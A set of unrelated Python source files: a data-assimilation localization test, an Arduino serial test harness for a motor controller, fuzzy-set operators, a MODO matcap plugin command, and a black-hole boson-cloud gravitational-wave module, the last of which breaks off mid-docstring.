card = self.find(card_name)
self.cards.remove(card)
def find(self, name: str):
card = [c for c in self.cards if c.name == name][0]
return card
|
#!/usr/bin/env python
###############################################################
# < next few lines under version control, D O N O T E D I T >
# $Date$
# $Revision$
# $Author$
# $Id$
###############################################################
###############################################################
# test_localization.py - test effect of localization on static
# and flow-dependent covariance.
# Currently implements the following:
# Lorenc 2003 Schur operator method
# Buehner 2005 method
# Liu et al. 2009 method (buggy)
###############################################################
###############################################################
__author__ = "Rahul Mahajan"
__email__ = "rahul.mahajan@nasa.gov"
__copyright__ = "Copyright 2012, NASA / GSFC / GMAO"
__license__ = "GPL"
__status__ = "Prototype"
###############################################################
###############################################################
import sys
import numpy as np
from matplotlib import pyplot
from module_DA import *
from module_IO import *
from plot_stats import plot_cov
###############################################################
###############################################################
def main():
fdiag = 'L96_hybDA_diag.nc4'
[model, DA, ensDA, varDA] = read_diag_info(fdiag)
if ( DA.do_hybrid ):[_, Xb, _, _, _, _, _, _, _, _] = read_diag(fdiag, 0)
else: [_, Xb, _, _, _, _, _] = read_diag(fdiag, 0)
Xbp = np.transpose(Xb - np.mean(Xb,axis=0))
Xb = np.transpose(Xb)
Bs = read_clim_cov(model=model)
Be = np.cov(Xb,ddof=1)
L = np.ones((model.Ndof,model.Ndof))
L2 = np.ones((model.Ndof,model.Ndof))
for i in range(0,model.Ndof):
for j in range(0,model.Ndof):
dist = np.float( np.abs( i - j ) ) / model.Ndof
if ( dist > 0.5 ): dist = 1.0 - dist
cov_factor = compute_cov_factor(dist, ensDA.localization)
L[i,j] = cov_factor
L2[i,j] = np.sqrt(cov_factor)
print 'i = %2d, j = %2d, d = %5.3f, c = %10.8f, c = %10.8f' % (i, j, dist, L[i,j], L2[i,j])
XbpLb = np.zeros((model.Ndof,model.Ndof*ensDA.Nens))
XbpLl = np.zeros((model.Ndof,model.Ndof*ensDA.Nens))
for i in range(0,ensDA.Nens):
start = i*model.Ndof
end = i*model.Ndof + model.Ndof
XbpLb[:,start:end] = np.dot(np.diag(Xbp[:,i]),L2) / np.sqrt(ensDA.Nens-1)
XbpLl[:,start:end] = L2 * np.repeat(np.transpose(np.matrix(Xbp[:,i])),model.Ndof,axis=1) / np.sqrt(ensDA.Nens-1)
Be_Lb = np.dot(XbpLb,np.transpose(XbpLb))
Be_Ll = np.dot(XbpLl,np.transpose(XbpLl))
fig1 = plot_cov(Bs, title="Static : $\mathbf{B}_s$")
fig2 = plot_cov(Be, title="Ensemble : $\mathbf{B}_e$")
fig3 = plot_cov(Bs*L, title="Static Schur : $\mathbf{B}_s \circ\ \mathbf{L}$")
fig4 = plot_cov(Be*L, title="Ensemble Schur : $\mathbf{B}_e \circ\ \mathbf{L}$")
fig5 = plot_cov(Be_Lb, title="Ensemble Buehner : $[\mathbf{X}^'_b \mathbf{L}] [\mathbf{X}^'_b \mathbf{L}]^{T}$")
fig6 = plot_cov(Be_Ll, title="Ensemble Liu")
fig7 = plot_cov(Bs-Bs*L, title="Difference Static - Static Schur")
fig8 = plot_cov(Be-Be*L, title="Difference Ensemble - Ensemble Schur")
fig9 = plot_cov(Be-Be_Lb, title="Difference Ensemble - Ensemble Buehner")
fig10 = plot_cov(Be-Be_Ll, title="Difference Ensemble - Ensemble Liu")
fig11 = plot_cov(Be*L-Be_Lb, title="Difference Ensemble Schur - Ensemble Buehner")
fig12 = plot_cov(Be*L-Be_Ll, title="Difference Ensemble Schur - Ensemble Liu")
fig13 = plot_cov(Be_Lb-Be_Ll, title="Difference Ensemble Buehner - Ensemble Liu")
pyplot.show()
sys.exit(0)
###############################################################
###############################################################
if __name__ == "__main__": main()
###############################################################
|
# in iPython:
# %run -i i2c.py
# the -i means use existing global variables; in particular: ser
# (otherwise, we end up with multiple open serial connections and it gets ugly)
import sys
import os
import re
import serial
import time
from math import ceil
from functools import reduce
from itertools import chain
if len(sys.argv) < 2:
print("Please specify a serial port as the first argument.", file=sys.stderr)
exit()
ser_port = sys.argv[1]
class CommunicationsError(Exception):
pass
def init_ser():
global mapped_variables
mapfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'esc_test.map')
mapfile_lines = open(mapfile, 'r').readlines()
mapped_variables = dict([(m.group(2), int(m.group(1), 0) - 0x800000) for s in mapfile_lines for m in [
re.search('(0x00000000008[0-9a-fA-F]+)\s*([a-zA-Z_]\w+)', s)] if m])
global ser
is_defined = 'ser' in globals() # see comment at top
is_open = is_defined and ser.isOpen()
min_ser_timeout = 0.010 # less than 10ms and we're going too quickly
if not is_open:
if not is_defined:
ser = serial.Serial(ser_port, 115200, timeout=0.01)
else:
ser.open()
# give the serial interface a bit of time to return data received _before_ the Arduino
# reset that we just caused by opening up the serial interface that is connected to
# the auto-reset circuit
time.sleep(.1)
ser.flushInput()
# now wait a max of one second for the initial serial dump from the Arduino; once we
# get a single byte, we can just eat up the rest and be done
for i in range(0,100):
by = ser.read(1)
if len(by) == 0:
time.sleep(.01)
else:
ser.read(100)
break
write('-Vb') # turn verbose off and binary on
if ser.timeout < min_ser_timeout:
print("adjusting ser.timeout from %.3f to %.3f" % (ser.timeout, min_ser_timeout))
ser.timeout = max(ser.timeout, min_ser_timeout)
[Ap, An, Bp, Bn, Cp, Cn, sense_common] = map(lambda n: 2**n, [0,1,2,3,4,5,6])
class serial_twi_bridge:
MAX_READ_BYTES = 0x20
class mcu:
F_CPU = 16e6
ADC_PRESCALAR = [2, 2, 4, 8, 16, 32, 64, 128] # probably common to all ATmegas
ADC_CYCLES_PER_SAMPLE = 13 # strictly speaking the first is 25 but we don't care
def adc_sample_time(prescalar):
return mcu.ADC_PRESCALAR[prescalar] / mcu.F_CPU * mcu.ADC_CYCLES_PER_SAMPLE
class MCUCSR:
WDRF = 3
BORF = 2
EXTRF = 1
PORF = 0
class config:
MAX_SAMPLE_COUNT = 0x100
current_res = 0.02
vcoil_scale = 2
vsup_scale = 11
# indexed by high_res = [0,1]
Vrefs = [5, 2.56]
resolutions = [256, 1024]
# indexed by adc = [0..7]
scales = [vcoil_scale, vcoil_scale, 0, 0, 0, 0, 1 / current_res, vsup_scale]
def _adjust_sample_count(v):
if v > config.MAX_SAMPLE_COUNT:
raise ValueError("max sample_count is %d, which is less than %d" %
(config.MAX_SAMPLE_COUNT, v))
# this is because the "do I make another ADC measurement?" if statement in the
# device looks like this:
# if (--copy_of_sample_count == 0)
# stop_adc();
# so if copy_of_sample_count starts off as zero, it will return as 0xFF and
# 0x100 samples will actually be taken
if v == config.MAX_SAMPLE_COUNT:
v = 0
return v
def set_sample_count(v):
config.sample_count = config._adjust_sample_count(v)
write_var('sample_count', config.sample_count)
def set_prescalar(v):
config.prescalar = v
write_var('prescalar', v)
def set_adc(v):
config.adc = v
write_var('which_adc', v)
def set_high_res(v):
config.high_res = v
write_var('high_res', v)
def set_vcoil():
config.set_high_res(0)
config.set_adc(0)
def set_current():
config.set_high_res(1)
config.set_adc(6)
def set_vsup():
config.set_high_res(0)
config.set_adc(7)
def convert_y():
c = config
return lambda adc: adc / c.resolutions[c.high_res] * c.Vrefs[c.high_res] * c.scales[c.adc]
def x_values():
spacing = mcu.adc_sample_time(config.prescalar)
return [spacing * n for n in range(0, config.sample_count)]
def trigger():
read_var(0xFFF9, 1);
def get_mcucsr():
return read_var8('mcucsr_mirror')
def check_reset_cause():
mcucsr = config.get_mcucsr()
m = mcu.MCUCSR
if (mcucsr & (1<<m.WDRF)) != 0:
print("RESET CAUSE: watchdog timer reset", file=sys.stderr)
if (mcucsr & (1<<m.BORF)) != 0:
print("RESET CAUSE: brown out", file=sys.stderr)
def flatten(a):
return list(chain.from_iterable(a))
def data(s):
return bytes(s, 'latin1')
def decode(by):
return by.decode('latin1')
def write(s):
ser.write(data(s))
ser.write(data('\r'))
def get_addr(var_name):
return mapped_variables[var_name]
def check_ack():
c = decode(ser.read(1))
if c != '~':
raise CommunicationsError("ERROR: did not get ~ as ack: '%s%s'" %
(c, decode(ser.read(500)).strip()))
def write_var(var, bytes):
addr = get_addr(var) if isinstance(var, str) else var
if not isinstance(bytes, list):
bytes = [bytes]
cmd = '%04X w %s' % (addr, ' '.join('%02X' % y for y in bytes))
#print("> %s" % cmd)
write(cmd)
check_ack()
def read_var8(var):
return read_var(var)[0]
def read_var(var, count=1, binary=True):
addr = get_addr(var) if isinstance(var, str) else var
cmd = '%04X %02X' % (addr, count)
#print("< %s" % cmd)
write(cmd)
check_ack()
if binary:
by = ser.read(count)
if len(by) < count:
raise CommunicationsError("Expected %d bytes, got %d: %s" % (count, len(by), by))
return list(by)
else:
expected = count * len('00 ') + len('\r\n')
by = ser.read(expected)
s = decode(by.strip())
if len(by) < expected:
raise CommunicationsError("Expected %d bytes, got %d: '%s'" % (expected, len(by), s))
try:
return [int(str(y), 16) for y in s.split(' ')]
except:
print("read_var: %s" % s)
raise
def get_waveform():
waveform_addr = get_addr('waveform')
v = []
chunk = serial_twi_bridge.MAX_READ_BYTES
for i in range(0, int(ceil(config.sample_count / chunk))):
v += read_var(waveform_addr, min(chunk, config.sample_count - i * chunk))
waveform_addr += chunk
return v
def exec(t):
expected_delay = mcu.adc_sample_time(config.prescalar) * config.sample_count
write_var('states', [s for s, w in t])
write_var('state_waits', flatten([w & 0xFF, (w & 0xFF00) >> 8] for s, w in t))
config.trigger()
time.sleep(expected_delay)
return get_waveform()
def exec_save(t, file):
with open(file, 'w') as f:
by = exec(t)
convert_y = config.convert_y()
x_values = config.x_values()
for idx, y in enumerate(by):
f.write('%d %.3f %.3f\n' % (y, x_values[idx] * 1e6, convert_y(y)))
#ser.read(500)
# sys.exit()
init_ser()
config.check_reset_cause()
# exec_save([(sen,200),(sen+Ap,delta_t),(sen,200)], 'wave')
# exec_save([(Cp+An,delta_t)], 'wave')
for i in range(0,2):
try:
fet_on_time = sense_on_time = 800
config.set_prescalar(6)
config.set_sample_count(0x30)
def with_sense(fet, file):
exec_save([
(sense_common, sense_on_time),
(sense_common+fet, fet_on_time),
(sense_common, sense_on_time)], file)
def without_sense(fets, file):
exec_save([(0, sense_on_time), (fets, fet_on_time)], file)
pFETs = [(Ap, 'Ap'), (Bp, 'Bp'), (Bp, 'Cp')]
nFETs = [(An, 'An'), (Bn, 'Bn'), (Cn, 'Cn')]
def rotate(l, n):
return l[n:] + l[0:n]
def interleave(l1, l2):
return flatten([a, b] for a,b in zip(l1, l2))
def double(n):
return [(pFET+nFET, '%s-%s' % (pS, nS)) for (pFET,pS),(nFET,nS) in zip(pFETs, rotate(nFETs, n))]
singles = pFETs + nFETs
doubles = interleave(double(1), double(2))
for f, ext in [
(config.set_vcoil, 'vcoil'),
(config.set_current, 'current'),
(config.set_vsup, 'vsup')]:
f()
for fet, name in singles:
with_sense(fet, '%s.%s' % (name, ext))
for fets, name in doubles:
without_sense(fets, '%s.%s' % (name, ext))
break
except CommunicationsError as ex:
print("ex: %s" % ex, file=sys.stderr)
continue
def gnuplot():
format_string = "set title '{0}'; plot " + \
', '.join(["'{{0}}.{0}' u 2:3 t '{1}' w lp{2}".format(*t) for t in [
('vcoil', 'V_{{coil}}', ''),
('vsup', 'V_{{battery}}', ''),
('current', 'I_{{battery}}', ' axes x1y2')]])
# `singles` and `doubles` are defined in the non-function code above
for fet, name in singles + doubles:
print(format_string.format(name))
|
from alphaOps import AlphaOps
from extention import ExtentionOps
#Gloabal w value, bad practice but this easy for now
w = 2
class Ops():
"""Used the generate the correct fuzzy set operation for each node"""
def printStuff(self):
print(dir(self))
def getFunc(self,operator):
ops = operator.split(":")
if ops[0] == "alpha":
return AlphaOps(ops[1]).alphaCuts
elif ops[0] == "extend":
return ExtentionOps(ops[1]).func
else:
return getattr(self,ops[0])
#Zadeh Operators#########################
def compliment(self, x):
return 1 - x[0]
def intersect(self, params):
return min(*params)
def union(self, params):
return max(*params)
#boudned sum operations##################
def bunion(self,params):
return min(1,sum(params))
def bintersect(self,params):
return max(0,(sum(params) - 1))
#Yager Operations##########################
def ycompliment(self,x):
return (1 - x[0]**w)**(1/w)
def yunion(self,params):
if(len(params) < 2):
raise Exception("Must provide at lease two params to perform an union")
# Takes the list of params, maps them to the lambda function thaat
# will take x to the power of w
return (min(1,(sum(list(map(lambda x : x ** w,params))))**(1/w)))
def yintersect(self,params):
if(len(params) < 2):
raise Exception("Must provide at lease two params to perform an intersection")
# does the same mapping as above but subtracts one before the mapping
return (min(1,(sum(list(map(lambda x : (1-x) ** w,params))))**(1/w)))
|
# python
import lx, bling, os, lxu
CMD_NAME = "bling.matcapAdd"
class CommandClass(bling.CommanderClass):
_commander_default_values = []
_icon = None
_imageCache = bling.imageCache()
def commander_arguments(self):
return [
{
'name': 'matcap',
'datatype': 'string',
'label': 'Matcap',
'values_list_type': 'popup',
'values_list': bling.MatcapListPop,
'flags': ['query']
}
]
def cmd_IconImage(self, w, h):
image_path = self.commander_arg_value(0)
if image_path:
TN = self._imageCache.GetImageTN(image_path)
return TN
def commander_execute(self, msg, flags):
image = self.commander_arg_value(0)
MatcapListPop = bling.MatcapListPop()
scnSel = lxu.select.SceneSelection().current()
scnSrv = lx.service.Scene()
render = scnSel.ItemLookup('Render')
if image == bling.NONE:
lx.eval("bling.matcapRemove")
MatcapListPop.setSelected()
elif image == bling.OPEN_FOLDER:
lx.eval('file.open {%s}' % bling.matcap_folder())
elif image == bling.UPDATE:
lx.eval("bling.matcapRemove")
MatcapListPop.getMatcapListPop()
image = MatcapListPop.getSelected()
if os.path.isfile(image):
lx.eval("bling.matcapRemove")
MatcapListPop.setSelected(image)
matCapObj = scnSel.ItemAdd(scnSrv.ItemTypeLookup('matcapShader'))
matCapObj.SetName(lx.eval("user.value bling_matcap_item_name ?"))
parentGraph = scnSel.GraphLookup('parent')
itemGraph = lx.object.ItemGraph(parentGraph)
childrenCount = itemGraph.RevCount(render)
itemGraph.SetLink(matCapObj, -1, render, -1)
lx.eval('clip.addStill {%s}' % image)
lx.eval('item.channel videoStill$colorspace "nuke-default:sRGB"')
lx.eval('select.item {%s} set' % matCapObj.Ident())
imageName = os.path.basename(image)
lx.eval('matcap.image {%s:videoStill001}' % imageName[:imageName.rfind('.')])
chan = scnSel.Channels('edit', 0.0)
chnWrite = lx.object.ChannelWrite(chan)
for channel in (('glOnly', 1), ('gamma', 1.0)):
idx = matCapObj.ChannelLookup(channel[0])
if type(channel[1]) == int:
return chnWrite.Integer(matCapObj, idx, channel[1])
elif type(channel[1]) == float:
return chnWrite.Double(matCapObj, idx, channel[1])
try:
# Since we currently can not target a GL window, we
# are wrapping this in a try just in case there is no available
# GL window, or we are focused on a UV window
lx.eval('!!view3d.shadingStyle advgl')
except:
pass
lx.bless(CommandClass, CMD_NAME)
|
# MIT License
# Copyright (c) 2018 Maximiliano Isi, Richard Brito
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import numpy as np
from scipy.special import factorial
from . import leavers
from .utilities import *
try:
# if LAL is available, import constants for better accuracy (?)
from lal import C_SI, G_SI, HBAR_SI, PC_SI, MSUN_SI, DAYSID_SI, YRSID_SI
except ImportError:
G_SI = 6.674e-11 # m^3 kg^-1 ss^-2
C_SI = 299792458 # m ss^-1
HBAR_SI = 1.054571e-34 # kg m^2 ss^-2*ss
PC_SI = 3.08567758e16 # m
MSUN_SI = 1.9891e30 # kg
EV_SI = 1.602176565e-19 # kg (m ss^-1)^2
MPL_SI = np.sqrt(HBAR_SI * C_SI / G_SI)
# ###########################################################################
# FUNCTIONS
def get_gw(alpha, lgw=2, l=1, m=1, nr=0, distance=1, times=False, **kwargs):
""" Get amplitude and frequency of GW emission for given alpha, and BH properties
determined by kwargs.
"""
cloud = BosonCloud.from_parameters(l, m, nr, alpha=alpha, **kwargs)
output = [cloud.gw(lgw).h0r/distance, cloud.gw(lgw).f]
if times:
output.append(cloud.number_growth_time)
output.append(cloud.get_life_time(lgws=[lgw]))
return output
def get_alpha_max(chi, m=1):
# max SR alpha is just Obh_nat, see Eq. (7) in paper
return 0.5*m*chi/(1 + np.sqrt(1 - chi**2))
def get_final_spin(alpha, m=1):
return 4.*alpha*m / (4.*alpha**2 + m**2)
def qcd_axion_mass(fa):
'''Mass of QCD axion as a function of symmetry breaking scale.
See e.g. Eq. (2) in [arXiv:1004.3558]
Arguments
---------
fa: float
Peccei-Quinn axion symmetry breaking scale in eV.
Returns
-------
mua: float
QCD axion mass in eV.
'''
return 6E-10 * (1E16 * 1E9 / fa)
def hydrogenic_level(n, alpha):
''' Return hydrogenic levels: (En / E0)
Arguments
---------
n: float
*principal* quantum number `n = nr + l + 1`, for `nr` the radial
and `l` the azimuthal quantum numbers.
alpha: float
Fine-structure constant.
Returns
-------
level: float
dimensionless level (En / E0).
'''
return 1 - 0.5 * (alpha/n)**2
# TODO: make these static methods of BlackHoleBoson?
def h0_scalar_brito(m_i, alpha, chi_i=0.9, d=1, l=1, m=1, lgw=None, mgw=None,
msun=True):
"""GW strain for scalar boson from Brito et al. [PhysRevD.96.064050]
Default GW emission at (lgw=2*l, mgw=2*m).
Arguments
---------
m_i: float, array
initial black-hole mass (in solar masses if `msun`, else kg).
alpha: float, array
fine-structure constant.
chi_i: float, array
initial black-hole spin parameter (dimensionless).
d: float, array
distance to source in meters (def. 1).
msun: bool
expect black-hole mass in solar masses.
Returns
-------
h0: float, array
gravitational-wave amplitude (strain).
fgw:
gravitational-wave frequency (Hz).
"""
# dimensionless boson frequency for (l=1, m=1, nr=0)
# same as `alpha*hydrogenic_level(1+1, alpha)` (see above)
mwr = alpha*hydrogenic_level(l + 1, alpha)
# dimensionless gravitational wave frequency
mwgw = 2*mwr
# black-hole final dimensionless spin, from Eq. (25)
chi_f = 4*mwr/(1 + 4*mwr**2)
# black-hole final mass, from Eq. (26)
m_i = m_i*MSUN_SI if msun else m_i
m_f = m_i*(1 - mwr*(chi_i - chi_f))
m_c = m_i - m_f
# dimensionfull GW frequency (rescaling `mwgw` by final BH mass)
fgw = C_SI**3 * mwgw / (2*np.pi*G_SI*m_f)
# numerical fit to GW emitted power for (lgw=2, mgw=2)
zabs = Zabs.fast_fit(alpha, lgw=lgw or 2*l, mgw=mgw or 2*m)
# Eq. (39) in Brito et al. with units restored
h0 = G_SI*2*zabs*m_c / (d * C_SI**2 * mwgw**2)
return h0, fgw
def h0_scalar_approx(alpha, f=None, m_bh=None, m_b=None, d=1,
msun=True, ev=True, chi=None):
""" Analytic approximation to the peak BHB scalar strain from Arvanitaki+.
Arguments
---------
alpha: float
gravitational fine-structure constant.
f: float
signal frequency
"""
if f is not None:
# `f_gw = 2*f_boson` implies:
m_b = HBAR_SI*np.pi*f
ev = True
a = Alpha(alpha=alpha, m_bh=m_bh, m_b=m_b, msun=msun, ev=ev)
if f is None:
f = a.fgw
h0 = 1E-24 * (a.alpha/0.1)**8 * (PC_SI*1E3/d) * (1E-12/a.m_b_ev)
if chi is not None:
# add spin correction
h0 *= (chi - get_final_spin(a.alpha)) / 0.1
return h0, f
def h0_vector_approx(alpha, f=None, m_bh=None, m_b=None, d=PC_SI*1E3,
msun=True, ev=True):
""" Analytic approximation to the peak BHB vector strain from Arvanitaki+.
Arguments
---------
alpha: float
gravitational fine-structure constant.
f: float
signal frequency
"""
if f is not None:
# `f_gw = 2*f_boson` implies:
m_b = HBAR_SI*np.pi*f
ev = True
a = Alpha(alpha=alpha, m_bh=m_bh, m_b=m_b, msun=msun, ev=ev)
if f is None:
f = a.m_b_ev / (HBAR_SI*np.pi)
h0 = 5E-21 * (a.alpha/0.1)**6 * (PC_SI*1E3/d) * (1E-12/a.m_b_ev)
return h0, f
def tinst_approx(m, alpha, chi, msun=True):
if msun:
m *= MSUN_SI
t = 27. * DAYSID_SI * (m/(10*MSUN_SI)) * (0.1/alpha)**9 / chi
return t
def tgw_approx(m, alpha, chi, msun=True):
if msun:
m *= MSUN_SI
t = (6.5E4) * YRSID_SI * (m/(10*MSUN_SI)) * (0.1/alpha)**15 / chi
return t
# TODO make these Cloud methods?
def get_sr_cond(x, jx, T0, epsilon, m=1):
return jx - x**2 * (m*x - jx) * 4*T0**2/(m*epsilon)**2
def Z22fit(a):
if (a <= 0.20):
return 0.7904787874157165*a**8 - 3.7424860251567065*a**9 + 8.014109763942045*a**10
elif (a > 0.20 and a <= 0.32):
return 0.004916101490720274*a - 0.03147120978236612*a**2 + 0.08775988014052985*a**3 - 0.08822040008857081*a**4 - 0.0002843701901412038
elif (a > 0.32 and a <= 0.39):
return 0.030448009925872987*a - 0.15871207790615727*a**2 + 0.3678694551762226*a**3 - 0.31822691778030665*a**4 - 0.002191953405332143
else:
return 57.61596540418577 - 799.870254999872*a + 4621.284921350437*a**2 - 14222.17764949403*a**3 + 24588.66580766965*a**4 - 22642.55327085838*a**5 + 8675.73911658002*a**6
Z22fitvec=np.vectorize(Z22fit)
# ###########################################################################
# CLASSES
class BlackHole(object):
def __init__(self, mass, chi=None, a=None, j=None, msun=False):
""" Black hole of given mass and spin.
Can pass spin using the dimensionless parameter `chi`, or the
Kerr parameter (dimensions of length) `a`, or the angular momentum
itself, `j`.
Defaults to no spin (`chi=0`) and fails if more than one spin
parameters are provided.
Arguments
---------
mass: float
mass in kg (or in MSUN, if `msun` is True).
chi: float
dimensionless spin, `chi = (c^2/G)(a/M)`, in (0, 1) [opt].
a: float
Kerr parameter, `a = J/(Mc)`, in meters [opt].
j: float
black-hole angular momentum, `J`, in SI units [opt].
msun: bool
whether `mass` is given in solar masses (def. False).
"""
# MASS
if msun:
self.mass = mass * MSUN_SI
self.mass_msun = mass
mass = self.mass
else:
self.mass = mass
self.mass_msun = mass / MSUN_SI
# LENGTHSCALE
self.rg = G_SI * mass / C_SI**2
self.rs = 2 * self.rg
# TIMESCALE
self.tg = self.rg / C_SI
# SPIN
if sum([int(spin_param is None) for spin_param in [chi, a, j]]) < 2:
raise ValueError("can only take one spin parameter: chi, a, or J.")
elif a is not None:
chi = a / self.rg
elif j is not None:
chi = j / (self.mass * C_SI * self.rg)
elif chi is None:
# no spin provided, default to Schwarzschild
chi = 0
self.chi = chi
self.a = self.rg * self.chi
self.angular_momentum = self.mass * C_SI * self.a
# RADII in natural units (G=M=c=1)
self.rp_natural = 1 + np.sqrt(1 - self.chi**2)
self.rm_natural = 1 - np.sqrt(1 - self.chi**2)
self.rp = self.rg * self.rp_natural
self.rm = self.rg * self.rm_natural
# ANGULAR VELOCITY
self.omega_horizon_natural = chi / (2. * self.rp_natural)
self.omega_horizon = chi * C_SI / (2. * self.rp) # = oh_nat * c / rg
# AREA
self.area = 4*np.pi*(self.rp**2 + self.a**2)
self.area_natural = 8 * np.pi * self.rp_natural
# SR-SPECIFIC
self._h0r_fits = {}
def sigma(self, r, theta):
""" Kerr auxiliary length Sigma, function of radius and polar angle
in Boyer Lindquist coordinates.
Arguments
---------
r : float
BL radius (m)
theta : float
BL polar angle (rad).
Returns
-------
sigma : float
sigma (m).
"""
return r**2 + self.a**2 * np.cos(theta)**2
def delta(self, r):
""" Kerr auxiliary length Delta, function of radius
in Boyer Lindquist coordinates.
Arguments
---------
r : float
BL radius (m)
Returns
-------
delta : float
delta (m).
"""
return r**2 - self.rs * r + self.a**2
def omega(self, r, theta):
""" Frame dragging angular frequency (rad) for Boyer-Lindquist radius
and polar angle.
"""
num = C_SI * self.rs * r * self.a
den = self.sigma(r, theta)*(r**2 + self.a**2) + \
self.rs * r * self.a**2 * np.sin(theta)**2
omega = num / den
return omega
def ergoshphere(self, theta, natural=False):
"""Innner and outer ergosphere radii for given polar angle.
"""
if natural:
rs = 2
a = self.chi
else:
rs = self.rs
a = self.a
rEp = 0.5 * (rs + np.sqrt(rs**2 - 4* a**2 * np.cos(theta)**2))
rEm = 0.5 * (rs - np.sqrt(rs**2 - 4* a**2 * np.cos(theta)**2))
return rEp, rEm
# --------------------------------------------------------------------
# UTILITIES
def scan_alphas(self, l=1, m=1, nr=0, delta_alpha=0.001, alpha_min=0.001,
alpha_max=None, lgw=None, verbose=False, ncpus=1, **kwargs):
alpha_max = alpha_max or get_alpha_max(self.chi, m=m)
alphas = np.arange(alpha_min, alpha_max, delta_alpha)
h0rs, fgws = [], []
iterable = alphas
# determine whether to show progress bar
if verbose:
try:
from tqdm import tqdm
iterable = tqdm(alphas)
except ImportError:
print("WARNING: need tqdm for verbosity.")
# iterate
for alpha in iterable:
cloud = BosonCloud.from_parameters(l, m, nr, m_bh=self.mass_msun,
chi_bh=self.chi, alpha=alpha,
**kwargs)
h0rs.append(cloud.gw(lgw).h0r)
fgws.append(cloud.gw(lgw).f)
return np.array(h0rs), np.array(fgws), alphas
def best_alpha(self, *args, **kwargs):
h0rs, fgws, alphas = self.scan_alphas(*args, **kwargs)
h0r_max = h0rs.max()
i_max = np.where(h0rs==h0r_max)[0][0]
return h0r_max, fgws[i_max], alphas[i_max]
# NOTE: currently, this is essentially just refitting Zabs, which is a bit
# dumb... however, the total mass of the cloud is also used, which might
# be computed numerically in the future to make the code more precise---so
# leave this as is.
def h0r_fit(self, f, **kwargs):
l = int(kwargs.pop('l', 1))
m = int(kwargs.pop('m', 1))
lgw = int(kwargs.pop('lgw', 2*l))
if (l, m, lgw) not in self._h0r_fits:
from scipy.interpolate import interp1d
h0rs, fgws, _ = self.scan_alphas(l=l, m=m, lgw=lgw, **kwargs)
self._h0r_fits[(l, m, lgw)] = interp1d(fgws, h0rs, fill_value=0,
bounds_error=False)
return self._h0r_fits[(l, m, lgw)](f)
def fgw(self, alpha=None, l=1, nr=0, m_b=None, ev=True):
a = Alpha(m_bh=self.mass_msun, alpha=alpha, m_b=m_b, ev=ev)
level_correction = hydrogenic_level(l+nr+1, a.alpha)
return level_correction * a.fgw
class Boson(object):
def __init__(self, mass, spin=0, ev=False):
""" A boson field of given mass and spin.
Arguments
---------
mass: float
mass in kg (or in eV, if `ev`).
spin: int
spin-weight (0, 1, 2).
ev: bool
mass provided in eV.
"""
if ev:
# the `mass` parameter was actually the energy
self.energy_ev = mass
self.energy = mass * EV_SI
self.mass = self.energy / C_SI**2
mass = self.mass
else:
self.mass = mass
self.energy = mass * C_SI**2
self.energy_ev = self.energy / EV_SI
# this last quantity is called `mu` by Arvanitaki et al.
self.spin = spin
self.omega = self.energy / HBAR_SI
self.reduced_compton_wavelength = HBAR_SI / (mass*C_SI)
self.compton_wavelength = 2*np.pi*self.reduced_compton_wavelength
# Other quantities
self.mu_brito = C_SI * self.mass / HBAR_SI
class Alpha(object):
def __init__(self, m_bh=None, m_b=None, alpha=None, msun=True, ev=True,
tolerance=1E-10):
""" Gravitational fine-structure constant.
Can be initialized with any two of (m_bh, m_b, alpha) to compute the
third quantity. If the three numbers are provided, will check they
are consistent (and fail with `ValueError` if not).
Arguments
---------
m_bh: float
black-hole mass (in MSUN, or SI if `msun` is False).
m_b: float
boson rest mass (eV, or SI if `ev` is False).
alpha: float
gravitational fine-structure constant (dimensionless).
msun: bool
BH mass provided in solar masses, rather than SI (def True).
ev: bool
boson mass provided in eV, rather than SI (def True).
"""
if m_bh is not None and msun:
m_bh = MSUN_SI*m_bh
if m_b is not None and ev:
m_b = m_b * EV_SI / C_SI**2
self.m_bh = m_bh
self.m_b = m_b
if all([p is not None for p in [m_bh, m_b, alpha]]):
# check consistency
alpha_new = self.compute(self.m_bh, self.m_b)
if abs(alpha - alpha_new) > tolerance:
raise ValueError("alpha incompatible with BH & boson masses.")
elif all([p is not None for p in [m_bh, alpha]]):
# compute boson mass
self.m_b = HBAR_SI * C_SI * alpha / (G_SI * self.m_bh)
elif all([p is not None for p in [m_b, alpha]]):
# compute BH mass
self.m_bh = HBAR_SI * C_SI * alpha / (G_SI * self.m_b)
self.alpha = alpha if alpha is not None else self.compute(self.m_bh, self.m_b)
@cached_property
def m_bh_msun(self):
return self.m_bh / MSUN_SI
@cached_property
def m_b_ev(self):
return self.m_b * C_SI**2 / EV_SI
@cached_property
def fgw(self):
return self.m_b_ev * EV_SI / (HBAR_SI*np.pi)
@staticmethod
def compute(m_bh, m_b):
return G_SI * m_bh * m_b / (HBAR_SI * C_SI)
class BlackHoleBoson(object):
def __init__(self, bh, boson):
""" System composed of a black-hole and a boson.
To create from parameters use `.from_parameters()` class method.
Arguments
---------
bh: BlackHole
black-hole instance.
boson: Boson
boson instance.
"""
self.bh = bh
self.boson = boson
# Fine-structure constant `G M m / (hbar c) = rg / lambda_bar_c`
self.alpha = self.bh.rg / self.boson.reduced_compton_wavelength
self.clouds = {}
self._has_waveform = False
# --------------------------------------------------------------------
# CLASS METHODS
@classmethod
def from_parameters(cls, **kwargs):
""" Create black-hole boson system from parameters.
Can pass any two of the mass parameters (m_bh, m_b, alpha) and
any one of the BH spin parameters (chi_bh, a_bh, j_bh).
The BH mass is assumed to be in units of MSUN, unless `msun=False` in
which case SI units are expected.
The boson mass is assumed to be in units of eV, unless `ev=False` in
which case SI units are expected.
The spin parameters (a_bh, j_bh) are always expected in SI units, while
